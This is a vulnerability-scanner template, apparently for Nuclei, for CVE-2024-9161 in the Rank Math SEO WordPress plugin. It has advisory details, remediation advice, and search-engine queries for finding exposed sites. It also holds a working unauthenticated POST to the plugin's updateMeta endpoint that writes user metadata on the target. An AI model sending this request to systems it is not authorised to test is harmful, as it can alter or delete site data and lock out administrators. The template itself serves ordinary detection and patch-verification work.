Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
PoC代码[已公开]
id: CVE-2024-9161
info:
name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
author: Kazgangap
severity: medium
description: |
Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
impact: |
Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
remediation: |
Update to version 1.0.229 or later.
reference:
- https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
- https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
cvss-score: 6.5
cve-id: CVE-2024-9161
cwe-id: CWE-862
epss-score: 0.09766
epss-percentile: 0.92673
cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: rankmath
product: seo
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev
variables:
objectid: "{{rand_int(1,9)}}"
data: "meta_{{to_lower(rand_text_alpha(12))}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Rank Math")'
condition: and
internal: true
- raw:
- |
POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"objectType": "user",
"objectID": {{objectid}},
"meta": {
"{{data}}": "{{data}}"
}
}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"slug", "true", "schemas")'
- 'contains(content_type, "application/json")'
- "status_code == 200"
condition: and
# digest: 4a0a0047304502205a99a000ddd28d8fa56f27735717684f77bc5c85ffe665f156e6d390aca191d2022100c480c343798645b623dea381e606be593ac7567b78bc39114992f3d73cac9183:922c64590222798bb761d5b6d8e72950